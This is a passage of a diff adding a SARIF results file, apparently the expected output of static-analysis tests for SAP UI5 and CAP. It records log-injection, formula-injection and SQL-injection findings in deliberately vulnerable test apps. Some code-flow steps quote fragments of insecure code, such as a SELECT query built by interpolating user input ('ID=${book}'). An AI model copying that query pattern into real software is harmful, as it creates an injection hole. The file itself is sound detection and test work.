[user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 17, + "startColumn" : 38, + "endColumn" : 47 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "f32b0dcd4573d6a3:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 184 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 185 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 8, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 
15, + "startColumn" : 29, + "endColumn" : 47 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 15, + "startColumn" : 21, + "endColumn" : 47 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 16, + "startColumn" : 50, + "endColumn" : 55 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 16, + "startColumn" : 43, + "endColumn" : 56 + } + }, + "message" : { + "text" : "String(value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 16, + "startColumn" : 33, + "endColumn" : 57 + } + }, + "message" : { + "text" : "encodeX ... 
value))" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 16, + "startColumn" : 21, + "endColumn" : 57 + } + }, + "message" : { + "text" : "sanitized" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + }, + "region" : { + "startLine" : 17, + "startColumn" : 38, + "endColumn" : 47 + } + }, + "message" : { + "text" : "sanitized" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 184 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 17, + "startColumn" : 34, + "endColumn" : 39 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "392fd43c95c7be9c:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 192 + }, + "region" : { + "startLine" : 6, + "startColumn" : 5, + "endLine" : 8, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 15, + "startColumn" : 25, + "endColumn" : 53 + } + }, + "message" : { + "text" : "oModel. ... 
input')" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 15, + "startColumn" : 17, + "endColumn" : 53 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + }, + "region" : { + "startLine" : 17, + "startColumn" : 34, + "endColumn" : 39 + } + }, + "message" : { + "text" : "input" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 192 + }, + "region" : { + "startLine" : 6, + "startColumn" : 5, + "endLine" : 8, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 16, + "startColumn" : 30, + "endColumn" : 35 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "27d08bf2c216b384:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 204 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 8, + "startColumn" : 11, + "endColumn" : 22 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 14, + "startColumn" : 21, + "endColumn" : 49 + } + }, + "message" : { + "text" : "oModel. ... 
input\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 14, + "startColumn" : 13, + "endColumn" : 49 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + }, + "region" : { + "startLine" : 16, + "startColumn" : 30, + "endColumn" : 35 + } + }, + "message" : { + "text" : "input" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 204 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 17, + "startColumn" : 34, + "endColumn" : 39 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "392fd43c95c7be9c:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 209 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 15, + "startColumn" : 25, + "endColumn" : 53 + } + }, + "message" : { + "text" : "oModel. ... 
input')" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 15, + "startColumn" : 17, + "endColumn" : 53 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + }, + "region" : { + "startLine" : 17, + "startColumn" : 34, + "endColumn" : 39 + } + }, + "message" : { + "text" : "input" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 209 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-formula-injection", + "rule" : { + "id" : "js/ui5-formula-injection", + "index" : 4, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The content of a saved file depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 145 + }, + "region" : { + "startLine" : 17, + "startColumn" : 27, + "endColumn" : 45 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "41899ff1a967017d:1", + "primaryLocationStartColumnFingerprint" : "10" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 150 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 146 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 145 + }, + "region" : { + "startLine" : 8, + "startColumn" : 23, + "endColumn" : 38 + } + }, + "message" : { + "text" : "{ type: \"int\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : 
"%SRCROOT%", + "index" : 145 + }, + "region" : { + "startLine" : 17, + "startColumn" : 27, + "endColumn" : 45 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 150 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-formula-injection", + "rule" : { + "id" : "js/ui5-formula-injection", + "index" : 4, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The content of a saved file depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 23, + "startColumn" : 27, + "endColumn" : 39 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "9afa5fd07ee36af6:1", + "primaryLocationStartColumnFingerprint" : "10" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 159 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 155 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 9, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 15, + "startColumn" : 29, + "endColumn" : 47 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 15, + "startColumn" : 21, + "endColumn" : 47 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 17, + "startColumn" : 53, + "endColumn" : 58 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 17, + "startColumn" : 46, + "endColumn" : 59 + } + }, + "message" : { + "text" : "String(value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 17, + "startColumn" : 36, + "endColumn" : 60 + } + }, + "message" : { + "text" : "encodeX ... value))" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 17, + "startColumn" : 21, + "endColumn" : 60 + } + }, + "message" : { + "text" : "xssSanitized" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 23, + "startColumn" : 27, + "endColumn" : 39 + } + }, + "message" : { + "text" : "xssSanitized" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 159 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-formula-injection", + "rule" : { + "id" : 
"js/ui5-formula-injection", + "index" : 4, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The content of a saved file depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + }, + "region" : { + "startLine" : 16, + "startColumn" : 23, + "endColumn" : 51 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e701acdf85af03b4:1", + "primaryLocationStartColumnFingerprint" : "10" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + }, + "region" : { + "startLine" : 16, + "startColumn" : 23, + "endColumn" : 51 + } + }, + "message" : { + "text" : "oModel. ... 
input')" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 13, + "startColumn" : 36, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e5ae8639cd6967fb:1", + "primaryLocationStartColumnFingerprint" : "29" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : 
"%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 12, + "startColumn" : 50, + "endColumn" : 54 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 12, + "startColumn" : 44, + "endColumn" : 56 + } + }, + "message" : { + "text" : "`ID=${book}`" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" 
: "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 12, + "startColumn" : 19, + "endColumn" : 57 + } + }, + "message" : { + "text" : "SELECT. ... book}`)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 12, + "startColumn" : 11, + "endColumn" : 57 + } + }, + "message" : { + "text" : "query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 13, + "startColumn" : 36, + "endColumn" : 41 + } + }, + "message" : { + "text" : "query" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." 
